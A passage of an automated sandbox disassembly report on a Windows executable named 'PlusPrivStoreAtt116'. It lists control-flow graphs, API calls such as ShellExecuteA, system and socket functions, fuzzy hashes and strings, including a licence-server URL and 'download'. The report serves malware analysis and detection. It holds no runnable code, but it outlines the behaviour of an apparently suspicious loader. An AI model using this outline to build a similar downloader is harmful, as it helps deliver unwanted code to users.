                                        • Opcode Fuzzy Hash: 41927ea1387b75350c3ebf46daa169a36e0fbdbc2e22d370c80ef841000f6fad
                                        • Instruction Fuzzy Hash: 0C516231608B4281DB509F25E4A86697761EF45BB8FA04730EA7E876E4DFBCE849C700

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2148 7ff6029c7290-7ff6029c72dd 2149 7ff6029c72df-7ff6029c72e3 2148->2149 2150 7ff6029c72e8-7ff6029c7323 call 7ff6029ce0c0 2148->2150 2151 7ff6029c7806-7ff6029c7824 call 7ff6029fff10 2149->2151 2155 7ff6029c7325 2150->2155 2156 7ff6029c7328-7ff6029c732b 2150->2156 2155->2156 2158 7ff6029c7348 2156->2158 2159 7ff6029c732d-7ff6029c7330 2156->2159 2162 7ff6029c734b-7ff6029c7377 call 7ff6029ce150 2158->2162 2160 7ff6029c7343-7ff6029c7346 2159->2160 2161 7ff6029c7332-7ff6029c7335 2159->2161 2160->2162 2161->2162 2163 7ff6029c7337-7ff6029c7341 2161->2163 2166 7ff6029c7392-7ff6029c739a 2162->2166 2167 7ff6029c7379-7ff6029c738d call 7ff6029c6280 2162->2167 2163->2162 2168 7ff6029c73c9-7ff6029c73e7 2166->2168 2169 7ff6029c739c-7ff6029c73ae call 7ff6029c8460 2166->2169 2174 7ff6029c77f6-7ff6029c77fe 2167->2174 2173 7ff6029c73f0-7ff6029c7405 2168->2173 2178 7ff6029c73b0-7ff6029c73b2 2169->2178 2179 7ff6029c73c2-7ff6029c73c4 2169->2179 2176 7ff6029c740b-7ff6029c741f call 7ff6029d68f0 2173->2176 2177 7ff6029c768a 2173->2177 2174->2151 2188 7ff6029c75a0-7ff6029c75a3 2176->2188 2189 7ff6029c7425-7ff6029c7450 call 7ff6029ce150 2176->2189 2181 7ff6029c768e-7ff6029c769f 2177->2181 2178->2179 2182 7ff6029c73b4-7ff6029c73bd call 7ff6029c8570 2178->2182 2179->2174 2181->2173 2184 7ff6029c76a5-7ff6029c76a7 2181->2184 2182->2179 2185 7ff6029c76ad-7ff6029c76c4 call 7ff6029c8b90 2184->2185 2186 7ff6029c77ec 2184->2186 2204 7ff6029c7777-7ff6029c7779 2185->2204 2205 7ff6029c76ca-7ff6029c76d1 2185->2205 2191 7ff6029c77ee 2186->2191 2192 7ff6029c75a5-7ff6029c75ac 2188->2192 2193 7ff6029c7614-7ff6029c765a SleepEx getsockopt 2188->2193 2202 7ff6029c7452-7ff6029c7464 call 7ff6029c6400 2189->2202 2203 7ff6029c7469-7ff6029c746c 2189->2203 2191->2174 2192->2193 2195 7ff6029c75ae-7ff6029c75b0 2192->2195 2198 7ff6029c7666 2193->2198 2199 7ff6029c765c-7ff6029c7664 WSAGetLastError 2193->2199 2200 7ff6029c74bf-7ff6029c74c1 2195->2200 2201 7ff6029c75b6-7ff6029c75fc SleepEx getsockopt 2195->2201 2206 7ff6029c766a-7ff6029c766c 2198->2206 2199->2206 2200->2177 2216 7ff6029c74c7-7ff6029c74dc WSASetLastError 2200->2216 2207 7ff6029c75fe-7ff6029c7606 WSAGetLastError 2201->2207 2208 7ff6029c760b-7ff6029c760f 2201->2208 2202->2203 2212 7ff6029c746e-7ff6029c7475 2203->2212 2213 7ff6029c74bb 2203->2213 2204->2191 2210 7ff6029c76d7-7ff6029c76de 2205->2210 2211 7ff6029c777b-7ff6029c7782 2205->2211 2214 7ff6029c766e-7ff6029c7674 2206->2214 2215 7ff6029c76e3-7ff6029c7731 2206->2215 2207->2200 2208->2200 2220 7ff6029c77a6-7ff6029c77e9 call 7ff6029b2e10 call 7ff6029c6280 2210->2220 2217 7ff6029c7784-7ff6029c778b 2211->2217 2218 7ff6029c778d-7ff6029c7794 2211->2218 2212->2213 2221 7ff6029c7477-7ff6029c74a3 call 7ff6029ce150 2212->2221 2213->2200 2214->2215 2224 7ff6029c7676-7ff6029c7685 call 7ff6029c6400 2214->2224 2222 7ff6029c7733-7ff6029c773b call 7ff6029c6ee0 2215->2222 2223 7ff6029c7746-7ff6029c775b call 7ff6029c8460 2215->2223 2216->2177 2225 7ff6029c74e2-7ff6029c754c call 7ff6029cf4b0 call 7ff6029b2e10 call 7ff6029c6400 2216->2225 2217->2220 2226 7ff6029c779f 2218->2226 2227 7ff6029c7796-7ff6029c779d 2218->2227 2220->2186 2221->2213 2242 7ff6029c74a5-7ff6029c74b6 call 7ff6029c8b90 2221->2242 2222->2223 2223->2191 2243 7ff6029c7761-7ff6029c7763 2223->2243 2224->2177 2251 7ff6029c756e-7ff6029c7584 call 7ff6029c8b90 2225->2251 2252 7ff6029c754e-7ff6029c7555 2225->2252 2226->2220 2227->2220 2242->2213 2243->2191 2247 7ff6029c7769-7ff6029c7772 call 7ff6029c8570 2243->2247 2247->2204 2258 7ff6029c7597-7ff6029c759b 2251->2258 2259 7ff6029c7586-7ff6029c7591 2251->2259 2252->2251 2253 7ff6029c7557-7ff6029c755e 2252->2253 2255 7ff6029c7560-7ff6029c7563 2253->2255 2255->2251 2257 7ff6029c7565-7ff6029c756c 2255->2257 2257->2251 2257->2255 2258->2181 2259->2177 2259->2258
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: After %I64dms connect time, move on!$Connection failed$Connection time-out$Failed to connect to %s port %ld: %s$connect to %s port %ld failed: %s
                                        • API String ID: 0-3307081561
                                        • Opcode ID: 8dab91604582c7dfdda867cc57369ccadec8d7195b63645d62acc9508cc3d9a3
                                        • Instruction ID: 6af9893c37898bbcd703cbda5457fcfbe3ff0b7917df1b8cdd9fdc104b5784cf
                                        • Opcode Fuzzy Hash: 8dab91604582c7dfdda867cc57369ccadec8d7195b63645d62acc9508cc3d9a3
                                        • Instruction Fuzzy Hash: 71E1F221B0868282EB148B6695443FDABA5FF48B98F300635DE5D877C6DFBCE451CB00
                                        APIs
                                          • Part of subcall function 00007FF6029B08F0: memcpy.VCRUNTIME140(?,0000006E00000006,?,FFFFFFFF,00007FF6029A11F9), ref: 00007FF6029B0928
                                        • SleepEx.KERNELBASE ref: 00007FF6029B1C5F
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029B1CD3
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029B1D14
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029B1D4C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$Sleepmemcpy
                                        • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789$PRIVATE STORE -
                                        • API String ID: 18138616-2486835083
                                        • Opcode ID: 02c974ba3ea694fb1581b36dc1d3936bca2f7c19c08318b0ff3533f4e3fd965b
                                        • Instruction ID: 9f377d6c5abfc247d9ef980d8a6a5a7cbf32447f06a64486fd07cd27e2b85e0e
                                        • Opcode Fuzzy Hash: 02c974ba3ea694fb1581b36dc1d3936bca2f7c19c08318b0ff3533f4e3fd965b
                                        • Instruction Fuzzy Hash: 9281E832F1868186EB11DB26E5503AE6B51FF85798F604336EA5D83ADADFBCD081C700
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F0104
                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F0184
                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F020B
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F027E
                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F036F
                                        • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F0393
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F03CF
                                        • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F0484
                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F04E2
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F04F3
                                        • strchr.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F05D2
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F05E9
                                        • strchr.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F0604
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F0615
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F0672
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F0684
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F0693
                                        • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F06D4
                                        • strchr.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F06F9
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F07C7
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F07D1
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F07DB
                                        • strchr.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F0844
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F088C
                                        • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F08F7
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F0937
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F0A12
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F0A29
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029F0A39
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _strdup$free$strchr$memcpystrcspn$malloc$strtoltolower
                                        • String ID: %%%02x$%*[^]]%c%n$%ld$127.0.0.1/$[%*45[0123456789abcdefABCDEF:.]%c%n$dict$dict.$file$ftp$ftp.$http$https$imap$imap.$ldap$ldap.$localhost/$pop3$pop3.$smtp$smtp.
                                        • API String ID: 2776400286-1669326226
                                        • Opcode ID: 61528fb2984773d5a9f40148fcce857f1341ff16bb59e5e523ed9ff6bec14591
                                        • Instruction ID: b302fc9bb57422325ae791d084f978fb4ecd4078b7bc35df4e59ef94e6652b65
                                        • Opcode Fuzzy Hash: 61528fb2984773d5a9f40148fcce857f1341ff16bb59e5e523ed9ff6bec14591
                                        • Instruction Fuzzy Hash: 90528F21E4C68685FBD18B2294543BE2FE9AF05B8CF644435EE5D866CBEEBCE445C300

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1215 7ff6029a2ab0-7ff6029a2aff call 7ff6029a2850 1218 7ff6029a2b05-7ff6029a2b0a 1215->1218 1219 7ff6029a30b8-7ff6029a3127 call 7ff6029a3130 Sleep exit 1215->1219 1218->1219 1221 7ff6029a2b10-7ff6029a2c2e call 7ff6029a3170 call 7ff6029a3c40 call 7ff6029a32e0 call 7ff6029a3c40 call 7ff6029a33e0 call 7ff6029a3c40 1218->1221 1224 7ff6029a3128-7ff6029a312f call 7ff6029a1a00 1219->1224 1238 7ff6029a2c30-7ff6029a2c41 1221->1238 1239 7ff6029a2c64-7ff6029a2c7d 1221->1239 1240 7ff6029a2c5f call 7ff6029ffb54 1238->1240 1241 7ff6029a2c43-7ff6029a2c56 1238->1241 1242 7ff6029a2c7f-7ff6029a2c91 1239->1242 1243 7ff6029a2cb5-7ff6029a2cbd 1239->1243 1240->1239 1241->1240 1246 7ff6029a2c58-7ff6029a2c5e _invalid_parameter_noinfo_noreturn 1241->1246 1248 7ff6029a2caf-7ff6029a2cb4 call 7ff6029ffb54 1242->1248 1249 7ff6029a2c93-7ff6029a2ca6 1242->1249 1244 7ff6029a2cbf-7ff6029a2cd0 1243->1244 1245 7ff6029a2cf3-7ff6029a2d0b 1243->1245 1252 7ff6029a2cee call 7ff6029ffb54 1244->1252 1253 7ff6029a2cd2-7ff6029a2ce5 1244->1253 1254 7ff6029a2d42-7ff6029a2d4a 1245->1254 1255 7ff6029a2d0d-7ff6029a2d1e 1245->1255 1246->1240 1248->1243 1249->1248 1250 7ff6029a2ca8-7ff6029a2cae _invalid_parameter_noinfo_noreturn 1249->1250 1250->1248 1252->1245 1253->1252 1259 7ff6029a2ce7-7ff6029a2ced _invalid_parameter_noinfo_noreturn 1253->1259 1256 7ff6029a2d80-7ff6029a2dc7 1254->1256 1257 7ff6029a2d4c-7ff6029a2d5d 1254->1257 1261 7ff6029a2d20-7ff6029a2d33 1255->1261 1262 7ff6029a2d3c-7ff6029a2d41 call 7ff6029ffb54 1255->1262 1265 7ff6029a2dc9-7ff6029a2dd6 1256->1265 1266 7ff6029a2dd8-7ff6029a2dfb 1256->1266 1263 7ff6029a2d5f-7ff6029a2d72 1257->1263 1264 7ff6029a2d7b call 7ff6029ffb54 1257->1264 1259->1252 1261->1262 1267 7ff6029a2d35-7ff6029a2d3b _invalid_parameter_noinfo_noreturn 1261->1267 1262->1254 1263->1264 1270 7ff6029a2d74-7ff6029a2d7a _invalid_parameter_noinfo_noreturn 1263->1270 1264->1256 1272 7ff6029a2e52-7ff6029a2ea8 call 7ff6029a3560 call 7ff6029a2850 call 7ff6029a4be0 call 7ff6029a48d0 1265->1272 1273 7ff6029a2e2f-7ff6029a2e32 1266->1273 1274 7ff6029a2dfd-7ff6029a2e04 1266->1274 1267->1262 1270->1264 1293 7ff6029a2eae-7ff6029a2ebd call 7ff6029a48d0 1272->1293 1294 7ff6029a2fb3-7ff6029a3023 call 7ff6029a48d0 call 7ff6029ffb18 call 7ff6029a4320 call 7ff6029a5a10 call 7ff6029a3e60 1272->1294 1275 7ff6029a2e34-7ff6029a2e39 call 7ff6029ffb18 1273->1275 1276 7ff6029a2e3b 1273->1276 1274->1224 1278 7ff6029a2e0a-7ff6029a2e18 call 7ff6029ffb18 1274->1278 1280 7ff6029a2e3e-7ff6029a2e4d memcpy 1275->1280 1276->1280 1287 7ff6029a2e28-7ff6029a2e2e _invalid_parameter_noinfo_noreturn 1278->1287 1288 7ff6029a2e1a-7ff6029a2e26 1278->1288 1280->1272 1287->1273 1288->1280 1299 7ff6029a2ebf-7ff6029a2ec3 1293->1299 1300 7ff6029a2ec5 1293->1300 1320 7ff6029a3071-7ff6029a30b7 call 7ff6029a48d0 call 7ff6029a4d10 call 7ff6029a3b20 MessageBoxA call 7ff6029a3ce0 exit 1294->1320 1321 7ff6029a3025-7ff6029a3070 call 7ff6029a48d0 call 7ff6029a49b0 call 7ff6029a3b20 ShellExecuteA exit 1294->1321 1302 7ff6029a2ec8-7ff6029a2ed1 1299->1302 1300->1302 1304 7ff6029a2ed3 1302->1304 1305 7ff6029a2ed6-7ff6029a2ef9 call 7ff6029a4320 call 7ff6029a3e60 1302->1305 1304->1305 1316 7ff6029a2f2f-7ff6029a2f43 1305->1316 1317 7ff6029a2efb-7ff6029a2f0c 1305->1317 1318 7ff6029a2f45-7ff6029a2f53 1316->1318 1319 7ff6029a2f79-7ff6029a2fb2 call 7ff6029fff10 1316->1319 1322 7ff6029a2f0e-7ff6029a2f21 1317->1322 1323 7ff6029a2f2a call 7ff6029ffb54 1317->1323 1324 7ff6029a2f71-7ff6029a2f74 call 7ff6029ffb54 1318->1324 1325 7ff6029a2f55-7ff6029a2f68 1318->1325 1320->1219 1321->1320 1322->1323 1329 7ff6029a2f23-7ff6029a2f29 _invalid_parameter_noinfo_noreturn 1322->1329 1323->1316 1324->1319 1325->1324 1331 7ff6029a2f6a-7ff6029a2f70 _invalid_parameter_noinfo_noreturn 1325->1331 1329->1323 1331->1324
                                        APIs
                                          • Part of subcall function 00007FF6029A2850: system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A28B7
                                          • Part of subcall function 00007FF6029A2850: system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A2927
                                          • Part of subcall function 00007FF6029A2850: system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A2987
                                          • Part of subcall function 00007FF6029A2850: system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A29D7
                                          • Part of subcall function 00007FF6029A2850: system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A2A27
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A2C58
                                          • Part of subcall function 00007FF6029A48D0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A4990
                                          • Part of subcall function 00007FF6029FFB18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,-3333333333333333,00007FF6029A43FE,7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF6029A1B59), ref: 00007FF6029FFB32
                                          • Part of subcall function 00007FF6029A4320: memcpy.VCRUNTIME140(7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF6029A1B59), ref: 00007FF6029A4351
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A2CA8
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A2CE7
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A2D35
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A2D74
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A2E28
                                        • memcpy.VCRUNTIME140 ref: 00007FF6029A2E4D
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A2F23
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A2F6A
                                        • ShellExecuteA.SHELL32 ref: 00007FF6029A3062
                                        • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A306A
                                        • MessageBoxA.USER32 ref: 00007FF6029A30A0
                                        • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A30B1
                                        • Sleep.KERNEL32 ref: 00007FF6029A3119
                                        • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A3121
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6029A3128
                                          • Part of subcall function 00007FF6029A3170: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A327F
                                          • Part of subcall function 00007FF6029A3170: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A32C0
                                          • Part of subcall function 00007FF6029A3C40: memcpy.VCRUNTIME140 ref: 00007FF6029A3C93
                                          • Part of subcall function 00007FF6029A32E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A33C0
                                          • Part of subcall function 00007FF6029A33E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A34C0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$system$exitmemcpy$Concurrency::cancel_current_taskExecuteMessageShellSleepmalloc
                                        • String ID: Failure$download$invalidver$message$open$sessionid$success
                                        • API String ID: 3283070336-3881042241
                                        • Opcode ID: 346884651f190215033ea341a8ed912bb79fe097eb9e9889446bc08b30e48f30
                                        • Instruction ID: 2c4bd0169986372ea7f3b99d4ebeafd4bbcd6e4e0d0b9851ea289ff069c1816e
                                        • Opcode Fuzzy Hash: 346884651f190215033ea341a8ed912bb79fe097eb9e9889446bc08b30e48f30
                                        • Instruction Fuzzy Hash: 4602D562E0878285EB00DB65E4443AD2B61FF4579CF605235EE5D87ADADFBCD084C380

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1346 7ff6029dbed0-7ff6029dbf4d 1347 7ff6029dbf4f-7ff6029dbf53 1346->1347 1348 7ff6029dbf6e-7ff6029dbf73 1346->1348 1347->1348 1351 7ff6029dbf55-7ff6029dbf69 call 7ff6029c6400 1347->1351 1349 7ff6029dbf92-7ff6029dbf96 1348->1349 1350 7ff6029dbf75-7ff6029dbf8d call 7ff6029c6400 1348->1350 1354 7ff6029dbfb1-7ff6029dbfb4 1349->1354 1355 7ff6029dbf98-7ff6029dbfac call 7ff6029c6400 1349->1355 1362 7ff6029dc3b3-7ff6029dc3b6 1350->1362 1361 7ff6029dc3bc-7ff6029dc3c9 1351->1361 1359 7ff6029dc2ca 1354->1359 1360 7ff6029dbfba-7ff6029dbfbe 1354->1360 1355->1362 1367 7ff6029dc2d2-7ff6029dc2da 1359->1367 1360->1359 1364 7ff6029dbfc4-7ff6029dbfd9 1360->1364 1365 7ff6029dc4d5-7ff6029dc4db 1361->1365 1366 7ff6029dc3cf-7ff6029dc3d3 1361->1366 1362->1361 1362->1365 1368 7ff6029dbfe0-7ff6029dc00b realloc 1364->1368 1369 7ff6029dbfdb-7ff6029dbfde 1364->1369 1371 7ff6029dc4ed-7ff6029dc503 1365->1371 1372 7ff6029dc4dd-7ff6029dc4e0 1365->1372 1366->1365 1370 7ff6029dc3d9-7ff6029dc3dd 1366->1370 1373 7ff6029dc2de 1367->1373 1375 7ff6029dc02e-7ff6029dc05b 1368->1375 1376 7ff6029dc00d-7ff6029dc029 call 7ff6029c6280 1368->1376 1369->1368 1374 7ff6029dc05d-7ff6029dc072 call 7ff6029c6600 1369->1374 1370->1365 1381 7ff6029dc3e3-7ff6029dc3f8 call 7ff6029c9110 1370->1381 1377 7ff6029dc505-7ff6029dc549 memcpy * 2 1371->1377 1378 7ff6029dc54b-7ff6029dc551 1371->1378 1372->1371 1382 7ff6029dc4e2-7ff6029dc4ea 1372->1382 1383 7ff6029dc2e6-7ff6029dc2ec 1373->1383 1388 7ff6029dc077-7ff6029dc07d 1374->1388 1375->1374 1376->1361 1384 7ff6029dc575-7ff6029dc597 call 7ff6029fff10 1377->1384 1386 7ff6029dc553-7ff6029dc556 1378->1386 1387 7ff6029dc565-7ff6029dc568 1378->1387 1408 7ff6029dc4be-7ff6029dc4d0 call 7ff6029c6400 1381->1408 1409 7ff6029dc3fe-7ff6029dc400 1381->1409 1382->1371 1390 7ff6029dc382-7ff6029dc388 1383->1390 1391 7ff6029dc2f2-7ff6029dc307 call 7ff6029c6400 1383->1391 1386->1387 1393 7ff6029dc558-7ff6029dc560 1386->1393 1394 7ff6029dc570-7ff6029dc572 1387->1394 1395 7ff6029dc56a-7ff6029dc56e 1387->1395 1396 7ff6029dc083-7ff6029dc08f 1388->1396 1397 7ff6029dc282-7ff6029dc28a 1388->1397 1400 7ff6029dc38e-7ff6029dc39e 1390->1400 1401 7ff6029dc0b0-7ff6029dc0bf 1390->1401 1412 7ff6029dc312-7ff6029dc322 1391->1412 1413 7ff6029dc309-7ff6029dc30c 1391->1413 1393->1387 1394->1384 1395->1394 1403 7ff6029dc091-7ff6029dc097 1396->1403 1404 7ff6029dc0a9-7ff6029dc0ae 1396->1404 1405 7ff6029dc2a2 1397->1405 1406 7ff6029dc28c-7ff6029dc29d 1397->1406 1400->1362 1411 7ff6029dc3a0-7ff6029dc3a4 1400->1411 1401->1362 1410 7ff6029dc0c5-7ff6029dc0c7 1401->1410 1414 7ff6029dc26e-7ff6029dc27d call 7ff6029c6400 1403->1414 1415 7ff6029dc09d-7ff6029dc0a4 call 7ff6029c6400 1403->1415 1404->1401 1405->1404 1416 7ff6029dc2a8-7ff6029dc2c5 1405->1416 1406->1401 1408->1365 1409->1408 1417 7ff6029dc406-7ff6029dc412 1409->1417 1410->1362 1419 7ff6029dc0cd-7ff6029dc0d0 1410->1419 1420 7ff6029dc3ab 1411->1420 1423 7ff6029dc4aa-7ff6029dc4b9 1412->1423 1424 7ff6029dc328-7ff6029dc369 call 7ff6029c6400 call 7ff6029da390 1412->1424 1413->1412 1422 7ff6029dc492-7ff6029dc499 1413->1422 1414->1404 1415->1404 1416->1401 1417->1365 1427 7ff6029dc0e2-7ff6029dc160 call 7ff6029c8cd0 1419->1427 1428 7ff6029dc0d2-7ff6029dc0d6 1419->1428 1421 7ff6029dc3ae call 7ff6029c6400 1420->1421 1421->1362 1422->1420 1423->1421 1441 7ff6029dc36f-7ff6029dc37d call 7ff6029c6400 